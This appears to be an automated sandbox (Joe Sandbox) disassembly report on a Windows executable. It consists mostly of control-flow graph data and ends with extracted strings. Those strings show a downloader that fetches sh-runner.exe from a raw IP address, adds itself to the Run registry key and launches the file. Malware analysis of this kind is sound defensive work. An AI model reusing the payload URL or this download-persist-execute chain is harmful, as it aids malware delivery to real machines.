3017->3013 3019 7ff71c8c741f 3018->3019 3020 7ff71c8c7457 3018->3020 3019->3020 3021 7ff71c8c7590 3019->3021 3022 7ff71c8c6ce0 6 API calls 3020->3022 3023 7ff71c8c6ce0 6 API calls 3021->3023 3024 7ff71c8c7471 3022->3024 3023->3024 3024->2993 3026 7ff71c8c6fe3 3025->3026 3027 7ff71c8c6ce0 6 API calls 3026->3027 3028 7ff71c8c7008 3027->3028 3029 7ff71c8c7024 memset 3028->3029 3030 7ff71c8c7047 3028->3030 3029->3030 3030->2993 3030->3030 3032 7ff71c8c72cf 3031->3032 3033 7ff71c8c6ce0 6 API calls 3032->3033 3034 7ff71c8c72de 3033->3034 3035 7ff71c8c738e 3034->3035 3036 7ff71c8c72f2 memset 3034->3036 3037 7ff71c8c7306 3034->3037 3035->2983 3036->3037 3038 7ff71c8c6dd0 5 API calls 3037->3038 3038->3035 3040 7ff71c8c6bc8 3039->3040 3045 7ff71c8c6bcc 3039->3045 3043 7ff71c8c6c17 InitializeCriticalSection InitializeCriticalSection 3040->3043 3040->3045 3041 7ff71c8c6c46 EnterCriticalSection 3041->3045 3042 7ff71c8c6bfb 3042->2997 3042->3000 3043->3045 3044 7ff71c8c6be0 Sleep 3044->3044 3044->3045 3045->3041 3045->3042 3045->3044 3061 7ff71c8c3950 3046->3061 3047 7ff71c8c3ac6 3049 7ff71c8c2ad0 fputc 3047->3049 3048 7ff71c8c39db 3050 7ff71c8c3bc0 3048->3050 3051 7ff71c8c39e7 3048->3051 3063 7ff71c8c39f9 3049->3063 3053 7ff71c8c2ad0 fputc 3050->3053 3055 7ff71c8c2ad0 fputc 3051->3055 3051->3063 3052 7ff71c8c39d3 3052->3047 3052->3048 3053->3063 3054 7ff71c8c3a1c 3056 7ff71c8c3b30 3054->3056 3065 7ff71c8c3a24 3054->3065 3055->3063 3057 7ff71c8c2ad0 fputc 3056->3057 3059 7ff71c8c3a7f 3057->3059 3058 7ff71c8c2ad0 fputc 3058->3061 3064 7ff71c8c37e0 10 API calls 3059->3064 3067 7ff71c8c3b50 3059->3067 3071 7ff71c8c3a89 3059->3071 3060 7ff71c8c2ad0 fputc 3060->3063 3061->3047 3061->3048 3061->3052 3061->3058 3061->3063 3062 7ff71c8c2ad0 fputc 3062->3065 3063->3054 3063->3060 3064->3067 3065->3062 3068 7ff71c8c3a78 3065->3068 3075 7ff71c8c2b30 4 API calls 3065->3075 3066 7ff71c8c3d01 3066->3066 3067->3066 3070 7ff71c8c3af0 3067->3070 3074 7ff71c8c2ad0 fputc 3067->3074 3068->3059 3069 7ff71c8c3ae8 3068->3069 3077 7ff71c8c37e0 3069->3077 3072 7ff71c8c3b20 3070->3072 3076 7ff71c8c2ad0 fputc 3070->3076 3071->2955 3072->2955 3074->3067 3075->3065 3076->3070 3078 7ff71c8c38d0 3077->3078 3079 7ff71c8c37fc 3077->3079 3092 7ff71c8c7d00 ___mb_cur_max_func ___lc_codepage_func 3078->3092 3080 7ff71c8c38b0 3079->3080 3081 7ff71c8c3809 3079->3081 3082 7ff71c8c2ad0 fputc 3080->3082 3085 7ff71c8c7a60 2 API calls 3081->3085 3083 7ff71c8c38bd 3082->3083 3083->3070 3086 7ff71c8c3839 3085->3086 3087 7ff71c8c38f6 3086->3087 3090 7ff71c8c3841 3086->3090 3088 7ff71c8c2ad0 fputc 3087->3088 3089 7ff71c8c389b 3088->3089 3089->3070 3090->3089 3091 7ff71c8c3885 fputc 3090->3091 3091->3089 3091->3090 3095 7ff71c8c7ba0 3092->3095 3094 7ff71c8c7d5b 3094->3087 3096 7ff71c8c7bb5 3095->3096 3104 7ff71c8c7c78 3095->3104 3097 7ff71c8c7c58 3096->3097 3098 7ff71c8c7be9 IsDBCSLeadByteEx 3096->3098 3101 7ff71c8c7c04 3096->3101 3096->3104 3099 7ff71c8c7cb0 MultiByteToWideChar 3097->3099 3100 7ff71c8c7c63 3097->3100 3098->3097 3098->3101 3099->3100 3103 7ff71c8c7cdc _errno 3099->3103 3100->3094 3102 7ff71c8c7c2e MultiByteToWideChar 3101->3102 3101->3104 3102->3103 3105 7ff71c8c7c48 3102->3105 3103->3104 3104->3094 3105->3094 3109 7ff71c8c2ceb 3106->3109 3110 7ff71c8c2da8 3106->3110 3107 7ff71c8c2d95 3107->2947 3108 7ff71c8c2ad0 fputc 3108->3110 3109->3107 3111 7ff71c8c2d50 3109->3111 3113 7ff71c8c2d45 fputc 3109->3113 3110->3108 3110->3109 3111->3107 3112 7ff71c8c2d86 fputc 3111->3112 3112->3111 3113->3109 3114 7ff71c8c4c27 3115 7ff71c8c4c37 3114->3115 3118 7ff71c8c4a70 3114->3118 3117 7ff71c8c3de0 28 API calls 3115->3117 3116 7ff71c8c3de0 28 API calls 3116->3118 3119 7ff71c8c4c53 3117->3119 3118->3115 3118->3116 3130 7ff71c8c48a2 3131 7ff71c8c4fa0 3130->3131 3132 7ff71c8c48b8 3130->3132 3132->3131 3133 7ff71c8c4c37 3132->3133 3134 7ff71c8c3de0 28 API calls 3132->3134 3135 7ff71c8c3de0 28 API calls 3133->3135 3134->3132 3136 7ff71c8c4c53 3135->3136 3137 7ff71c8c8021 LeaveCriticalSection 3138 7ff71c8c7aa0 ___lc_codepage_func ___mb_cur_max_func 3139 7ff71c8c7ad1 3138->3139 3142 7ff71c8c7adb 3138->3142 3140 7ff71c8c7b30 3139->3140 3141 7ff71c8c7ad6 3139->3141 3140->3142 3143 7ff71c8c79d0 2 API calls 3140->3143 3141->3142 3144 7ff71c8c79d0 2 API calls 3141->3144 3143->3140 3144->3141 2857 7ff71c8c4a19 2858 7ff71c8c4a2f 2857->2858 2859 7ff71c8c4a3f 2857->2859 2867 7ff71c8c2e10 2858->2867 2861 7ff71c8c4f61 2859->2861 2862 7ff71c8c4e2b 2859->2862 2864 7ff71c8c2b30 4 API calls 2861->2864 2870 7ff71c8c2b30 2862->2870 2866 7ff71c8c4f78 2864->2866 2866->2866 2868 7ff71c8c2e50 strlen 2867->2868 2869 7ff71c8c2e35 2867->2869 2868->2869 2869->2868 2880 7ff71c8c7a60 2870->2880 2872 7ff71c8c2c4a 2873 7ff71c8c2b5f 2874 7ff71c8c2ad0 fputc 2873->2874 2878 7ff71c8c2b79 2873->2878 2874->2873 2875 7ff71c8c7a60 2 API calls 2875->2878 2876 7ff71c8c2ad0 fputc 2877 7ff71c8c2c1d 2876->2877 2877->2872 2877->2876 2878->2872 2878->2875 2878->2877 2879 7ff71c8c2bf6 fputc 2878->2879 2879->2878 2881 7ff71c8c7a7d 2880->2881 2884 7ff71c8c79d0 2881->2884 2883 7ff71c8c7a95 2883->2873 2885 7ff71c8c7a00 WideCharToMultiByte 2884->2885 2886 7ff71c8c79e4 2884->2886 2885->2886 2887 7ff71c8c7a44 _errno 2885->2887 2886->2887 2888 7ff71c8c79eb 2886->2888 2887->2883 2888->2883 3148 7ff71c8c4cd1 3149 7ff71c8c4cda localeconv 3148->3149 3151 7ff71c8c4658 3148->3151 3150 7ff71c8c7d00 6 API calls 3149->3150 3150->3151 3152 7ff71c8c474f 3151->3152 3153 7ff71c8c2ad0 fputc 3151->3153 3154 7ff71c8c46f0 fputc 3151->3154 3153->3151 3154->3151 3155 7ff71c8c25d0 strlen 3156 7ff71c8c2660 3155->3156 3158 7ff71c8c25e5 3155->3158 3157 7ff71c8c264e 3158->3156 3158->3157 3159 7ff71c8c2639 strncmp 3158->3159 3159->3157 3159->3158 3160 7ff71c8c47d0 3163 7ff71c8c4658 3160->3163 3161 7ff71c8c2ad0 fputc 3161->3163 3162 7ff71c8c474f 3163->3161 3163->3162 3164 7ff71c8c46f0 fputc 3163->3164 3164->3163 3168 7ff71c8c49d5 3169 7ff71c8c49f6 3168->3169 3172 7ff71c8c4a14 3168->3172 3170 7ff71c8c2cc0 3 API calls 3169->3170 3170->3172 3171 7ff71c8c2b30 4 API calls 3173 7ff71c8c4c22 3171->3173 3172->3171 3173->3173 3174 7ff71c8c4b48 3175 7ff71c8c4b58 3174->3175 3176 7ff71c8c495e 3174->3176 3177 7ff71c8c4e71 3175->3177 3178 7ff71c8c4b84 3175->3178 3176->3177 3182 7ff71c8c49a7 3176->3182 3179 7ff71c8c2e60 3 API calls 3177->3179 3180 7ff71c8c4bd2 3178->3180 3178->3182 3183 7ff71c8c49cb 3179->3183 3184 7ff71c8c2e60 3 API calls 3180->3184 3181 7ff71c8c4eef 3187 7ff71c8c2e60 3 API calls 3181->3187 3182->3181 3182->3183 3189 7ff71c8c40e0 3183->3189 3184->3183 3188 7ff71c8c5068 3187->3188 3188->3188 3193 7ff71c8c40fb 3189->3193 3190 7ff71c8c457b 3191 7ff71c8c37e0 10 API calls 3191->3193 3192 7ff71c8c2ad0 fputc 3192->3193 3193->3190 3193->3191 3193->3192 3194 7ff71c8c2b30 4 API calls 3193->3194 3194->3193 3195 7ff71c8c4947 3196 7ff71c8c4b58 3195->3196 3197 7ff71c8c495e 3195->3197 3198 7ff71c8c4e71 3196->3198 3199 7ff71c8c4b84 3196->3199 3197->3198 3203 7ff71c8c49a7 3197->3203 3200 7ff71c8c2e60 3 API calls 3198->3200 3201 7ff71c8c4bd2 3199->3201 3199->3203 3204 7ff71c8c49cb 3200->3204 3205 7ff71c8c2e60 3 API calls 3201->3205 3202 7ff71c8c4eef 3208 7ff71c8c2e60 3 API calls 3202->3208 3203->3202 3203->3204 3206 7ff71c8c40e0 11 API calls 3204->3206 3205->3204 3207 7ff71c8c4e01 3206->3207 3207->3207 3209 7ff71c8c5068 3208->3209 3209->3209 3210 7ff71c8c234b 3211 7ff71c8c2370 3210->3211 3212 7ff71c8c2366 3210->3212 3211->3212 3213 7ff71c8c2387 EnterCriticalSection LeaveCriticalSection 3211->3213 3213->3212 2707 7ff71c8c2cc0 2710 7ff71c8c2ceb 2707->2710 2711 7ff71c8c2da8 2707->2711 2708 7ff71c8c2d95 2710->2708 2712 7ff71c8c2d50 2710->2712 2714 7ff71c8c2d45 fputc 2710->2714 2711->2710 2715 7ff71c8c2ad0 2711->2715 2712->2708 2713 7ff71c8c2d86 fputc 2712->2713 2713->2712 2714->2710 2716 7ff71c8c2ae0 2715->2716 2717 7ff71c8c2af0 2716->2717 2718 7ff71c8c2b10 fputc 2716->2718 2717->2711 2718->2711 3214 7ff71c8c23c0 3215 7ff71c8c23d2 3214->3215 3216 7ff71c8c23e0 EnterCriticalSection 3214->3216 3217 7ff71c8c2423 LeaveCriticalSection 3216->3217 3218 7ff71c8c23fc 3216->3218 3218->3217 3219 7ff71c8c241e free 3218->3219 3219->3217 3223 7ff71c8c4a44 3224 7ff71c8c4c99 3223->3224 3225 7ff71c8c4a5b 3223->3225 3228 7ff71c8c3f60 30 API calls 3224->3228 3226 7ff71c8c4a70 3225->3226 3234 7ff71c8c3f60 3225->3234 3230 7ff71c8c4c37 3226->3230 3231 7ff71c8c3de0 28 API calls 3226->3231 3229 7ff71c8c4cb5 3228->3229 3232 7ff71c8c3de0 28 API calls 3230->3232 3231->3226 3233 7ff71c8c4c53 3232->3233 3235 7ff71c8c3f79 3234->3235 3236 7ff71c8c4078 3234->3236 3237 7ff71c8c29e0 15 API calls 3235->3237 3239 7ff71c8c2e60 3 API calls 3236->3239 3238 7ff71c8c3fa1 3237->3238 3238->3236 3240 7ff71c8c3fb4 3238->3240 3241 7ff71c8c409f 3239->3241 3242 7ff71c8c4020 3240->3242 3245 7ff71c8c3fc8 3240->3245 3241->3226 3243 7ff71c8c4024 strlen 3242->3243 3244 7ff71c8c402f 3242->3244 3243->3244 3248 7ff71c8c3d10 11 API calls 3244->3248 3246 7ff71c8c40b0 strlen 3245->3246 3247 7ff71c8c3fd0 3245->3247 3246->3247 3250 7ff71c8c3930 11 API calls 3247->3250 3249 7ff71c8c4044 3248->3249 3249->3226 3251 7ff71c8c3fe7 3250->3251 3252 7ff71c8c400a 3251->3252 3253 7ff71c8c2ad0 fputc 3251->3253 3252->3226 3253->3251 3254 7ff71c8c4cba 3255 7ff71c8c2ad0 fputc 3254->3255 3256 7ff71c8c4ccc 3255->3256 3256->3256 3257 7ff71c8c8039 GetLastError 3266 7ff71c8c7ff1 VirtualQuery 2719 7ff71c8c13f0 2722 7ff71c8c1180 2719->2722 2721 7ff71c8c1406 2723 7ff71c8c11b0 2722->2723 2724 7ff71c8c11b9 Sleep 2723->2724 2726 7ff71c8c11cd 2723->2726 2724->2723 2725 7ff71c8c134c _initterm 2727 7ff71c8c1200 2725->2727 2726->2725 2726->2727 2731 7ff71c8c12ee 2726->2731 2740 7ff71c8c1d70 2727->2740 2729 7ff71c8c1228 SetUnhandledExceptionFilter 2730 7ff71c8c124b 2729->2730 2732 7ff71c8c1250 malloc 2730->2732 2733 7ff71c8c1180 22 API calls 2731->2733 2739 7ff71c8c1302 2731->2739 2732->2731 2734 7ff71c8c127a 2732->2734 2735 7ff71c8c13e6 2733->2735 2736 7ff71c8c1280 strlen malloc memcpy 2734->2736 2735->2721 2736->2736 2737 7ff71c8c12b2 2736->2737 2757 7ff71c8c169c 2737->2757 2739->2721 2748 7ff71c8c1da8 2740->2748 2756 7ff71c8c1d91 2740->2756 2741 7ff71c8c2080 2742 7ff71c8c2089 2741->2742 2741->2756 2746 7ff71c8c20ad 2742->2746 2801 7ff71c8c1c00 2742->2801 2744 7ff71c8c20c0 2745 7ff71c8c1b90 8 API calls 2744->2745 2747 7ff71c8c20cc 2745->2747 2751 7ff71c8c1b90 8 API calls 2746->2751 2747->2729 2748->2741 2748->2744 2748->2746 2752 7ff71c8c1f80 2748->2752 2753 7ff71c8c1e8e 2748->2753 2748->2756 2750 7ff71c8c1f7a 2750->2752 2751->2744 2755 7ff71c8c1fb2 VirtualProtect 2752->2755 2752->2756 2753->2748 2753->2750 2754 7ff71c8c1c00 8 API calls 2753->2754 2777 7ff71c8c1b90 2753->2777 2754->2753 2755->2752 2756->2729 2758 7ff71c8c16b1 2757->2758 2759 7ff71c8c16e7 strlen 2758->2759 2825 7ff71c8c8090 2759->2825 2764 7ff71c8c1763 RegOpenKeyA 2767 7ff71c8c185f 2764->2767 2768 7ff71c8c179f strlen RegSetValueExA RegCloseKey 2764->2768 2765 7ff71c8c174a 2766 7ff71c8c8090 2 API calls 2765->2766 2771 7ff71c8c1759 2766->2771 2773 7ff71c8c8090 2 API calls 2767->2773 2769 7ff71c8c8090 2 API calls 2768->2769 2770 7ff71c8c17fd 2769->2770 2772 7ff71c8c8090 2 API calls 2770->2772 2771->2731 2774 7ff71c8c1813 ShellExecuteA 2772->2774 2773->2771 2774->2771 2775 7ff71c8c1880 2774->2775 2776 7ff71c8c8090 2 API calls 2775->2776 2776->2771 2784 7ff71c8c1bbc 2777->2784 2778 7ff71c8c1cce 2778->2753 2779 7ff71c8c1d52 2780 7ff71c8c1b90 4 API calls 2779->2780 2798 7ff71c8c1d61 2780->2798 2781 7ff71c8c1c8d VirtualQuery 2782 7ff71c8c1d37 2781->2782 2781->2784 2782->2779 2785 7ff71c8c1b90 4 API calls 2782->2785 2783 7ff71c8c1d91 2783->2753 2784->2778 2784->2779 2784->2781 2786 7ff71c8c1ce0 VirtualProtect 2784->2786 2785->2779 2786->2778 2787 7ff71c8c1d18 GetLastError 2786->2787 2788 7ff71c8c1b90 4 API calls 2787->2788 2788->2784 2789 7ff71c8c1c00 4 API calls 2791 7ff71c8c2080 2789->2791 2790 7ff71c8c20c0 2792 7ff71c8c1b90 4 API calls 2790->2792 2791->2783 2791->2789 2793 7ff71c8c20ad 2791->2793 2794 7ff71c8c20cc 2792->2794 2796 7ff71c8c1b90 4 API calls 2793->2796 2794->2753 2795 7ff71c8c1b90 4 API calls 2795->2798 2796->2790 2797 7ff71c8c1c00 VirtualQuery VirtualProtect GetLastError VirtualProtect 2797->2798 2798->2783 2798->2790 2798->2791 2798->2793 2798->2795 2798->2797 2799 7ff71c8c1f7a 2798->2799 2799->2783 2800 7ff71c8c1fb2 VirtualProtect 2799->2800 2800->2799 2807 7ff71c8c1c19 2801->2807 2802 7ff71c8c1cce 2802->2742 2803 7ff71c8c1d52 2804 7ff71c8c1b90 4 API calls 2803->2804 2821 7ff71c8c1d61 2804->2821 2805 7ff71c8c1c8d VirtualQuery 2806 7ff71c8c1d37 2805->2806 2805->2807 2806->2803 2808 7ff71c8c1b90 4 API calls 2806->2808 2807->2802 2807->2803 2807->2805 2809 7ff71c8c1ce0 VirtualProtect 2807->2809 2808->2803 2809->2802 2810 7ff71c8c1d18 GetLastError 2809->2810 2811 7ff71c8c1b90 4 API calls 2810->2811 2811->2807 2812 7ff71c8c1c00 4 API calls 2814 7ff71c8c2080 2812->2814 2813 7ff71c8c20c0 2815 7ff71c8c1b90 4 API calls 2813->2815 2814->2812 2816 7ff71c8c20ad 2814->2816 2824 7ff71c8c1d91 2814->2824 2817 7ff71c8c20cc 2815->2817 2820 7ff71c8c1b90 4 API calls 2816->2820 2817->2742 2818 7ff71c8c1c00 VirtualQuery VirtualProtect GetLastError VirtualProtect 2818->2821 2819 7ff71c8c1b90 4 API calls 2819->2821 2820->2813 2821->2813 2821->2814 2821->2816 2821->2818 2821->2819 2822 7ff71c8c1f7a 2821->2822 2821->2824 2823 7ff71c8c1fb2 VirtualProtect 2822->2823 2822->2824 2823->2822 2824->2742 2826 7ff71c8c80c5 2825->2826 2848 7ff71c8c2990 2826->2848 2828 7ff71c8c172e 2829 7ff71c8c1450 2828->2829 2830 7ff71c8c145b 2829->2830 2831 7ff71c8c8090 2 API calls 2830->2831 2832 7ff71c8c148d InternetOpenA 2831->2832 2833 7ff71c8c14ca 2832->2833 2834 7ff71c8c14ee InternetOpenUrlA 2832->2834 2837 7ff71c8c8090 2 API calls 2833->2837 2835 7ff71c8c1536 2834->2835 2836 7ff71c8c156d 2834->2836 2839 7ff71c8c8090 2 API calls 2835->2839 2838 7ff71c8c1601 InternetReadFile 2836->2838 2841 7ff71c8c1594 2836->2841 2845 7ff71c8c14e4 2837->2845 2840 7ff71c8c1629 2838->2840 2839->2845 2842 7ff71c8c1640 fclose 2840->2842 2843 7ff71c8c15de fwrite 2840->2843 2844 7ff71c8c8090 2 API calls 2841->2844 2846 7ff71c8c1662 2842->2846 2843->2838 2844->2845 2845->2764 2845->2765 2847 7ff71c8c8090 2 API calls 2846->2847 2847->2845 2849 7ff71c8c29a5 2848->2849 2852 7ff71c8c45a0 2849->2852 2851 7ff71c8c29bd 2851->2828 2853 7ff71c8c45cb 2852->2853 2854 7ff71c8c46f0 fputc 2853->2854 2855 7ff71c8c2ad0 fputc 2853->2855 2856 7ff71c8c474f 2853->2856 2854->2853 2855->2853 2856->2851 3267 7ff71c8c4bf0 3268 7ff71c8c4bff 3267->3268 3269 7ff71c8c2b30 4 API calls 3268->3269 3270 7ff71c8c4c22 3269->3270 3270->3270 3271 7ff71c8c76f0 3272 7ff71c8c6ce0 6 API calls 3271->3272 3273 7ff71c8c770f 3272->3273 3274 7ff71c8c7d70 ___lc_codepage_func ___mb_cur_max_func 3275 7ff71c8c7dc9 3274->3275 3276 7ff71c8c7db0 3274->3276 3276->3275 3277 7ff71c8c7dc1 3276->3277 3280 7ff71c8c7e30 3276->3280 3277->3275 3278 7ff71c8c7ba0 4 API calls 3277->3278 3278->3277 3279 7ff71c8c7ba0 4 API calls 3279->3280 3280->3275 3280->3279 3281 7ff71c8c2170 signal 3282 7ff71c8c22c4 signal 3281->3282 3284 7ff71c8c2186 3281->3284 3283 7ff71c8c21e6 3282->3283 3284->3283 3285 7ff71c8c229c signal 3284->3285 3286 7ff71c8c21cb signal 3284->3286 3285->3283 3286->3284 3287 7ff71c8c22b0 signal 3286->3287 3287->3283 3288 7ff71c8c4770 3289 7ff71c8c4782 3288->3289 3290 7ff71c8c4f08 3288->3290 3289->3290 3291 7ff71c8c4fe6 3289->3291 3292 7ff71c8c47b5 3289->3292 3300 7ff71c8c3430 3290->3300 3294 7ff71c8c2f00 6 API calls 3292->3294 3295 7ff71c8c47c2 3294->3295 3296 7ff71c8c4c37 3295->3296 3297 7ff71c8c3de0 28 API calls 3295->3297 3298 7ff71c8c3de0 28 API calls 3296->3298 3297->3295 3299 7ff71c8c4c53 3298->3299 3302 7ff71c8c3463 3300->3302 3301 7ff71c8c354a memset 3303 7ff71c8c3560 3301->3303 3302->3301 3302->3303 3305 7ff71c8c359b 3303->3305 3306 7ff71c8c3741 3303->3306 3308 7ff71c8c35a7 3303->3308 3304 7ff71c8c35c8 3310 7ff71c8c3678 3304->3310 3312 7ff71c8c3660 fputc 3304->3312 3305->3308 3311 7ff71c8c2ad0 fputc 3305->3311 3307 7ff71c8c3752 memset 3306->3307 3306->3308 3307->3308 3308->3304 3309 7ff71c8c360a fputc 3308->3309 3309->3304 3309->3308 3310->3291 3311->3305 3312->3304 3313 7ff71c8c47e8 3314 7ff71c8c4f4f 3313->3314 3316 7ff71c8c47fe 3313->3316 3315 7ff71c8c3430 5 API calls 3315->3316 3316->3315 3317 7ff71c8c19e0 3319 7ff71c8c19f2 3317->3319 3318 7ff71c8c1a02 3319->3318 3320 7ff71c8c2450 3 API calls 3319->3320 3321 7ff71c8c1a55 3320->3321 3330 7ff71c8c4c58 3331 7ff71c8c4a93 3330->3331 3332 7ff71c8c4c68 3330->3332 3341 7ff71c8c3e80 3331->3341 3333 7ff71c8c3e80 29 API calls 3332->3333 3335 7ff71c8c4c84 3333->3335 3336 7ff71c8c4a70 3337 7ff71c8c4c37 3336->3337 3338 7ff71c8c3de0 28 API calls 3336->3338 3339 7ff71c8c3de0 28 API calls 3337->3339 3338->3336 3340 7ff71c8c4c53 3339->3340 3342 7ff71c8c3e94 3341->3342 3343 7ff71c8c29e0 15 API calls 3342->3343 3344 7ff71c8c3ec3 3343->3344 3345 7ff71c8c3f40 3344->3345 3346 7ff71c8c3ed4 3344->3346 3348 7ff71c8c2e60 3 API calls 3345->3348 3347 7ff71c8c3930 11 API calls 3346->3347 3350 7ff71c8c3ee3 3347->3350 3349 7ff71c8c3f4f 3348->3349 3349->3336 3350->3349 3351 7ff71c8c3f28 fputc 3350->3351 3351->3350 3352 7ff71c8c8011 SetUnhandledExceptionFilter 3353 7ff71c8c1010 3355 7ff71c8c104b 3353->3355 3354 7ff71c8c106d __set_app_type 3356 7ff71c8c1077 3354->3356 3355->3354 3355->3356 3357 7ff71c8c6c90 3358 7ff71c8c6cb0 DeleteCriticalSection 3357->3358 3359 7ff71c8c6ca5 3357->3359 3360 7ff71c8c2116 3362 7ff71c8c2141 3360->3362 3361 7ff71c8c21e6 3362->3361 3363 7ff71c8c229c signal 3362->3363 3364 7ff71c8c21cb signal 3362->3364 3363->3361 3364->3362 3365 7ff71c8c22b0 signal 3364->3365 3365->3361 3366 7ff71c8c4c89 3367 7ff71c8c4c99 3366->3367 3368 7ff71c8c4a5b 3366->3368 3371 7ff71c8c3f60 30 API calls 3367->3371 3369 7ff71c8c4a70 3368->3369 3370 7ff71c8c3f60 30 API calls 3368->3370 3373 7ff71c8c4c37 3369->3373 3374 7ff71c8c3de0 28 API calls 3369->3374 3370->3369 3372 7ff71c8c4cb5 3371->3372 3375 7ff71c8c3de0 28 API calls 3373->3375 3374->3369 3376 7ff71c8c4c53 3375->3376 3377 7ff71c8c1a80 3378 7ff71c8c1a9f 3377->3378 3379 7ff71c8c1add fprintf 3378->3379 3380 7ff71c8c7e80 ___mb_cur_max_func ___lc_codepage_func 3381 7ff71c8c7ba0 4 API calls 3380->3381 3382 7ff71c8c7ecd 3381->3382 3383 7ff71c8c4e06 3384 7ff71c8c4e0a 3383->3384 3385 7ff71c8c4f61 3384->3385 3386 7ff71c8c4e2b 3384->3386 3388 7ff71c8c2b30 4 API calls 3385->3388 3387 7ff71c8c2b30 4 API calls 3386->3387 3389 7ff71c8c4e45 3387->3389 3390 7ff71c8c4f78 3388->3390 3390->3390 3396 7ff71c8c4884 3397 7ff71c8c4890 3396->3397 3398 7ff71c8c2e10 strlen 3397->3398 3399 7ff71c8c489d 3398->3399 3399->3399 3400 7ff71c8c8083 3401 7ff71c8c80c5 3400->3401 3402 7ff71c8c2990 2 API calls 3401->3402 3403 7ff71c8c80d7 3402->3403 3409 7ff71c8c4a7c 3410 7ff71c8c4a93 3409->3410 3411 7ff71c8c4c68 3409->3411 3413 7ff71c8c3e80 29 API calls 3410->3413 3412 7ff71c8c3e80 29 API calls 3411->3412 3414 7ff71c8c4c84 3412->3414 3418 7ff71c8c4a70 3413->3418 3415 7ff71c8c4c37 3417 7ff71c8c3de0 28 API calls 3415->3417 3416 7ff71c8c3de0 28 API calls 3416->3418 3419 7ff71c8c4c53 3417->3419 3418->3415 3418->3416

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: InternetOpen
                                                                      • String ID: Downloader$Failed to create file. Error: %ld$File downloaded to: %s$InternetOpen failed. Error: %ld$InternetOpenUrl failed. Error: %ld$Starting download from: %s
                                                                      • API String ID: 2038078732-3706866148
                                                                      • Opcode ID: c9da2b257414b64ef9cf78d9f389ab95daf9465a16b9b81184522febe6ca77d9
                                                                      • Instruction ID: 23d7c0dbec720a836331e968d1d9930a5754b94fd6e1db08cb1b8c22a7e8503c
                                                                      • Opcode Fuzzy Hash: c9da2b257414b64ef9cf78d9f389ab95daf9465a16b9b81184522febe6ca77d9
                                                                      • Instruction Fuzzy Hash: A2513121B25F4788EB70EBA5E8D07F9A360EB447E8FA40036DD0D47BA4DE2DD6598314

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
                                                                      • String ID:
                                                                      • API String ID: 3806033187-0
                                                                      • Opcode ID: 00cd5bc779e85805f5c7e24dd35275362a4537a0d72859afc22e7dbc697c536f
                                                                      • Instruction ID: b01762e26ba4e1e277728891a2677b314a1b5e19ba6e63538ab04e9cfb7b24a9
                                                                      • Opcode Fuzzy Hash: 00cd5bc779e85805f5c7e24dd35275362a4537a0d72859afc22e7dbc697c536f
                                                                      • Instruction Fuzzy Hash: BB512635A2AF0285F710BFD5E8C12F9E2A1AF44BA4FA44036D91C47791DE2CF4698328

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: Openstrlen$CloseExecuteInternetShellValue
                                                                      • String ID: Added to startup.$Failed to download file.$Failed to launch file. Error: %ld$Failed to open registry. Error: %ld$Launching file: %s$MyProgram$Saving file to: %s$Software\Microsoft\Windows\CurrentVersion\Run$\sh-runn$http://84.201.150.223/sh-runner.exe$ner.exe$open
                                                                      • API String ID: 3194364268-3409995752
                                                                      • Opcode ID: a2ae2c9ca35328b334f6838570fb28f5b9dd242b2fe4c4d74bd9b39881edcf40
                                                                      • Instruction ID: ed83692744cd52eed9a952dfa85be6d6623ff1a2ecaf33ef506e789a714eef10
                                                                      • Opcode Fuzzy Hash: a2ae2c9ca35328b334f6838570fb28f5b9dd242b2fe4c4d74bd9b39881edcf40
